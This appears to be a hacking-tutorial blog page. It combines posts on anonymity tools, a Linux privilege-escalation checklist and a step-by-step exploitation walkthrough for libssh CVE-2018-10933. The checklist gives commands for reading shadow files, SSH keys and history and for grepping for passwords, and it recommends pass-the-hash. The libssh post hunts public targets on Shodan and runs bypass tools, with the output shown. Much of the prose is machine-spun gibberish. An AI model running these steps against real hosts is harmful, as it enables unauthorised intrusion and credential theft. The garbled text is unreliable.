Learn Penetration Testing And Ethical Hacking Online.


  • Facebook
  • Popular Posts

    Showing posts with label penetration-testing. Show all posts
    Showing posts with label penetration-testing. Show all posts

    If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.

    The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.

    Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.

    The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.
    Continue Reading
    What is Tor

    There are several different components and products in the name of which is the word "Tor". To clearly understand what we're talking about, let's start by defining the terms.
    Tor is a program that you can run on your computer to connect to the Tor network.

    The Tor network is a multitude of volunteer computers that process web site requests and redirect the response to the Tor user.

    The Tor browser is a complex of programs whose main components are: Tor + Firefox browser + plugins and settings to increase the level of anonymity.

    What is Tor used for?

    Tor can be used for various purposes:

    • data encryption so that it cannot be analyzed by an Internet service provider or by unauthorized persons on your local network or when using open networks (example of the “ Intercept and analyze traffic in open Wi-Fi ” attack ).
    • hiding your IP address from the final website
    • access blocked websites in your area
    Continue Reading
      privilege  escalation techniques on Linux

    what is privilege escalation?
    Privilege Escalation on Linux

    A privilege step-up attack may be a sort of network intrusion that takes advantage of programming errors or style flaws to grant the wrongdoer elevated access to the network and its associated information and applications.

    Not each system hack can at first give associate unauthorized user with full access to the targeted system. In those circumstances privilege increase is needed. There square measure 2 sorts of privilege escalation: vertical and horizontal.

    Vertical privilege increase needs the wrongdoer to grant himself higher privileges. this is often usually achieved by performing arts kernel-level operations that permit the wrongdoer to run unauthorized code.

    Horizontal privilege increase needs the wrongdoer to use an equivalent level of privileges he already has been granted, however assume the identity of another user with similar privileges. as an example, somebody gaining access to a different person's on-line banking account would represent horizontal privilege increase.


    Always make sure you have a permission from

    the system owner before participating in any “hacking” acDviDes

    Techniques discussed here, if used while not

    permission, ar considered malicious and ineligible

    Privilege Escalation on Linux 

    • Enumeration
    • Quick wins
    • Exploiting weak configuration
    • Exploiting vulnerable services
    • Kernel exploitation
    • Post exploitation


     what is enumeration in hacking.?

    Enumeration is outlined because the method of extracting user names, machine names, network resources, shares and services from a system. during this part, the wrongdoer creates a full of life association to the system and performs directed queries to realize additional info concerning the target. The gathered info is employed to spot the vulnerabilities or weak points in system security and tries to take advantage of within the System gaining part.

    Enumeration (cont.) 

    • Who are we?

    whoami id

    • What’s the operating system and kernel (32 / 64 bit?)

    uname –a cat /etc/issue
    • What can we learn from environment variables?
    env cat /etc/profile /etc/bashrc ~/.bashrc ~/.bash_profile ~/.bash_logout

    • What services are running and with what privilege?

    ps –ef

     • Are there any scheduled jobs?

    crontab –l cat /etc/crontab

     • What’s the IP address and network interfaces?

    ifconfig –a cat /etc/network/interfaces

     • Check network configuration semngs
    cat /etc/networks
    cat /etc/hosts cat /etc/resolv.conf

    iptables -L
     • Check open ports

    netstat -antup

     • What other users are on the system?
    cat /etc/passwd last
     • Check for senstive files and directories  "if you can access them as current user"
    cat /etc/shadow ls -al /var/mail/ ls –alR /root/ ls -alR /home/
     • What was the user doing?
    cat ~/.bash_history
    • Can you find private keys?
    ls –al ~/.ssh/

    Check if current user can run any commands with sudo,what would then execute them with root permissions
    sudo –l
    • What to look for?

    User may run the following commands: (ALL : ALL) NOPASSWD: ALL (ALL) NOPASSWD: /opt/scripts/* (ALL) NOPASSWD: /opt/admin/custom_binary

    Command History

    • Some commands or poorly wriSen scripts require users to enter their credentials as a command line parameters 
    • Everything that user types in is saved in the command history
    • Check command history files for any sensiDve data (credenDals,configuration,interesting directories)
    cat ~/.bash_historycat ~/.ksh_history
    SSH Private Keys

    • System administrators sometimes overlook the importance of keeping private keys… private,and
    leave them around on the servers 
    • Check if the current user has any SSH private keys saved on the system
      ls –al ~/.ssh/id_rsa ~/.ssh/id_dsa
    • Users oien reuse the same key across number of
    different accounts, including root, and number of various servers

    Hardcoded Passwords

    • You can oien find hardcoded passwords to various services or user accounts in scripts or log files
    • Search the entire file system for “password” string

    grep –R –i “password” /
    • See if you can access any sensitive configuration files
    or logs
    cat /etc/syslog.confcat /etc/apache2/apache2.conf cat /var/log/syslog cat /var/log/apache2/access.log
    Weak Configura-on – SUID/GUID binaries 

    • execute with permissions of the owner (root)

    $ ls –l /usr/bin/passwd -rwsr-xr-x 1 root root 53112 Nov 19 2014 /usr/bin/passwd

    • Find all binaries with SUID/GUID

    find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \;

     World Read/ Write directories (cont.)
    • To find all world writeable directories:
    find / -perm -0002 -type d -print
    • To find all world writeable files:
    find / -perm -0002 -type f -print
     • Find both files and directories (exclude symbolic links which produce false posiDves):

    find / -perm -2 ! -type l -ls
     Vulnerable Services (cont.)

    • Find all processes running on the system:
    ps –ef ps –ef | grep root
    • Find installed applications and note their version:
    dpkg –l rpm -qa
    • Search for known vulnerabilities in discovered processes and services (https://exploit-db.com, Google)

    Kernel Exploits
    • Find out what kernel version is the system running:
    uname -a
    • Find a relevant one for the version of target kernel:
    using searchsploit to find exploits


    • Remember! Not all exploits will work
     Post Exploitation

    • What is post exploitation?
    As the term suggests, post exploitation primarily means that the phases of operation once a victim's system has been compromised by the aggressor. the worth of the compromised system is set by the worth of the particular knowledge keep in it and the way Associate in Nursing aggressor could build use of it for malicious functions. The conception of post exploitation has up from this truth solely on however you'll be able to use the victim's compromised system's data. This section really deals with grouping sensitive data, documenting it, and having an inspiration of the configuration settings, network interfaces, and alternative communication channels. These could also be accustomed maintain persistent access to the system as per the attacker's desires.

    • Go through all sensiDve files that you can now access, parDcularly ones with password hashes
    • Crack password hashes
    – using hashcat, john or online rainbow tables
    • If you can’t crack the hash, use pass-the-hash technique to log-in to different hosts using only password hashes
    Continue Reading
    how to exploit libssh vulnerable flaw


    Computers everywhere the globe believe the libssh library. The issue with this is often the discharge of bug CVE-2018-10933. Unfortunately for hackers, this server bug was patched shortly when the discharge. Fortunately, however, for hackers, barely anyone takes the time to update their SSH libraries, so score there.

    How the Exploit Works

    In a traditional SSH session, the user can decide to log in with a username and arcanum, and according to whether or not the credentials are valid, the server will accept or reject the connection. In the example below, we tend to decide to log in to a server running libssh with the incorrect arcanum by writing ssh username@ipaddress into a terminal window.
    ssh root@ The authenticity of host ' (' can't be established. RSA key fingerprint is SHA256:Vkx9gDp1E/df1Yn0bDrgXIIYcTnyCVU6vmgqLKKqrhQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '' (RSA) to the list of known hosts. root@'s password: Permission denied, please try again. root@'s password: Permission denied, please try again. root@'s password: root@ Permission denied (publickey,keyboard-interactive,password).
    Because we tend to don’t grasp the arcanum, the decide to connect is rejected, and we are kept out of the server. On high of this, we tend to ar illegal from connecting to it server for a few time if we tend to try and log in too persistently and fail.

    In versions of libssh with the bug in question, a user will trick the system into thinking they're already attested by causing Associate in Nursing sudden message indicating the association already succeeded, bypassing the need to supply a password. It permits Associate in Nursing assailant to realize complete management over the affected system with no information of the arcanum, and it represents a vital vulnerability in any system with affected versions of libssh.

    So How Does This Bug Work?

    Imagine if you may gain access to a stranger’s house by just telling them you reside there. In this trick, we tend to skip the method of proving we tend to belong with a arcanum and instead send a “success” message.

    This bug works when an attacker doesn’t attempt to log within the traditional method in the least, and instead sends the server a message that looks to verify that the attacker has already authenticated. This “authentication succeeded” message confuses the server into granting access while not a password, whole bypassing the conventional security of the system.


    The first program we'll use to scan for vulnerable devices is named Nmap, which might simply be installed. On Kali, it ought to than by default, however if it’s not, you'll be able to quickly download it with the following command.

    apt install nmap

    In order to find if a device we have a tendency to discover is vulnerable, we'll be using the Python program libssh-scanner. It’s is written in Python 2.7, thus if you simply have Python three installed, you'll need to make certain to additionally install Python a pair of.7.

    To install libssh-scanner, you need to clone the libssh-scanner repository by typewriting the subsequent into a terminal window.

    git clone https://github.com/leapsecurity/libssh-scanner.git
    Then, once navigating inside the directory and listing its contents, you need to install the specified libraries by running the pip command seen below.
    cd libssh-scanner ls pip install -r requirements.txt

    Next, you would like to in addition install the program to thanperform the attack ,. This time, you’re cloning the “libSSH-Authentication-Bypass” repository four and installing any dependencies using the subsequent commands
    git clone https://github.com/purplesec/libSSH-Authentication-Bypass.git cd libSSH-Authentication-Bypass pip install -r requirements.txt

    The first step to fixing or exploiting a vulnerable device is finding it, and it’s comparatively simple to seek out devices on your native network that will need attention. To do so, we'll use a program referred to as Nmap to find devices running an SSH server and verify if libssh is running on them. Nmap is an essential tool in any hacker’s toolkit, enabling one to quickly scan and see all hosts and services on a given network or IP range.

    In this case, we'll scan the devices connected domestically to our network, and Nmap can tell us whether or not every device on the network is using a vulnerable version of libssh. To follow this guide, you'll got to install Nmap, however if you use Kali Linux, you possible have already got Nmap installed.

    To scan and find out all devices on the local network using libssh, open a terminal window and enter the subsequent nmap command.

    nmap -sV -p22
    Breaking down the command, nmap tells the pc that we would like to really begin using Nmap, whereas -sV tells Nmap that we would like to perform a service scan, that grabs the banner of any service utilized by on an open port. The flag -p22 tells Nmap to only scan devices on port 22, that is the standard port for SSH communication. whereas this won't realize devices that use SSH on a different port, it'll dramatically reduce search times.

    Finally, the target expressed as a subnet range; the primary three bytes of this may be unique to your search. once scanning a range of computers instead of only one, the 0/24 at the end is essential for looking the complete subnet. If you would like to find your subnet range, you'll use a tool like “ipcalc” which can calculate it for you. To do so, find your IP address from typewriting ifconfig , then type ipcalc yourIP (replace “yourIP” along with your IP address).

    The command will come back a list of devices connected to the subnet, also as some info gathered from the scanned port. in this case we tend to ar trying to find any targets that ar using a version of libssh earlier than 0.7.6. you'll expect to see AN output like below

    Nmap scan report for Host is up (0.0098s latency). PORT STATE SERVICE VERSION 22/tcp closed ssh Nmap scan report for Host is up (0.21s latency). PORT STATE SERVICE VERSION 22/tcp open ssh libssh 0.7.2 (protocol 2.0) Nmap scan report for Host is up (0.079s latency). PORT STATE SERVICE VERSION 22/tcp closed ssh Nmap scan report for Host is up (0.024s latency). PORT STATE SERVICE VERSION 22/tcp filtered ssh
      The vast majority of vulnerable servers are accessible via a remote network, thus we'll need to search during a different way to find devices not connected directly to our LAN.
      To find a remote target, you'll need to make the most of a service known as Shodan 4, a look engine that may find any device connected to internet — unlike Google that only returns results from web servers on port 80. as an example, instead of directing you to a web site attempting to sell you security cameras, Shodan will direct you to the login page of functioning IP cameras, potentially granting you access to the camera given the default password is unchanged.

      Shodan can have indexed several vulnerable SSH servers, that we will search for each by port number and different keyword searches that reveal hosts running versions of libssh before 0.7.6 that we know to be affected by the vulnerability.

      To start, register for a free account, that allows you to look at the primary two pages of any search question, or about 20 unique devices. Then, to find servers vulnerable to the libssh exploit, you’ll need three terms within the search:
    • port:22 , that is that the default port for the SSH protocol. even if SSH may be moved to any unused port, this isn’t too common because all it really will is forestall the server from being found with an easy scan for port 22.
    • LibSSH , that returns any server that advertises using the libssh library, indicating that they're potentially exploitable.
    • 0.7.* , that limits the results of the search to devices that ar using versions of libssh that begin with “0.7.” and excludes a lot of up-to-date versions from the results. while you'll still get some results that ar patched, you’ll eliminate most of the a lot of updated devices with this filter.

    The search above can come back a list of IP addresses that may be vulnerable to this attack, along side some a lot of info that Shodan was able to retrieve. Shodan’s info will include a banner pull, the location of the device, the latest activity, and also the organization in control of the server.


    nce you've got gathered a listing of targets liable to the exploit, either local or remote, you'll use “libssh-scanner” to scan target IP addresses and determine if they’re still possible vulnerable. other tools will go even more to try establishing a shell, however it's important to note that accessing another device using SSH while not permission may violate the pc Fraud and Abuse Act. depending on who owns the device you access, this will land you in serious legal trouble.

    In addition to legal issues, you should be wary of connecting to devices from your real IP address that might be purposely vulnerable to this exploit. Honeypots ar often created this way to attract amateur hackers, and you'll end up within a device configured as a trap.

    Now, use libssh-scanner to see if the targets gathered in steps 2 and 3 can really be vulnerable to the exploit. To do this, create a TXT file containing all of The Ip addresses found in steps 2 and 3, with each IP address separated by new lines. Name this text file “ips1.txt” and place it within a similar folder as libssh-scanner was downloaded to earlier in step 1.
    Once within the directory, enter the following command into a terminal window.

    python libsshscan.py --port 22 --aggressive ips1.txt

    The command can run Python 2.7, scan every IP address within the text file, and determine if the target is really vulnerable to the CVE-2018-10933 security flaw. As you'll see below, performing the scan narrowed down the list of potential targets from Shodan to only one —

    python libsshscan.py --aggressive --port 22 ips1.txt libssh scanner 1.0.4 Searching for Vulnerable Hosts... * is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.2')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')! is likely VULNERABLE to authentication bypass (b'SSH-2.0-libssh-0.7.2')* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')

    Scanner Completed with success

    To check the one result, use libSSH-Authentication-Bypass to check the attack.
    change directory into the folder you downloaded libSSH-Authentication-Bypass to
    previously in step 1,
    and enter the subsequent command, work “” with the IP address

    you would like to scan.
    python3 libsshauthbypass.py --host
    The command returns the subsequent output on a server that has been partially patched however
    continues to be vulnerable to the authentication bypass.

    python3 bypasswithfakekey.py --host DEBUG:paramiko.transport:starting thread (client mode): 0x74a0d30 DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8 DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2 INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2) DEBUG:paramiko.transport:kex algos:['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', 'zlib@openssh.com'] server compress:['none', 'zlib', 'zlib@openssh.com'] client lang:[''] server lang:[''] kex follows?False DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1 DEBUG:paramiko.transport:Cipher agreed: aes128-ctr DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256 DEBUG:paramiko.transport:Compression agreed:

    If you see a message indicating the connection is successful , then you’ve confirmed the vulnerability on the device

    you’re testing. If the connection fails, otherwise you see a part successful result like higher than, then you’ve

    confirmed that the difficulty doesn't affect the target (even tho' it should need to be updated anyway if you get a

    partial success)
    Continue Reading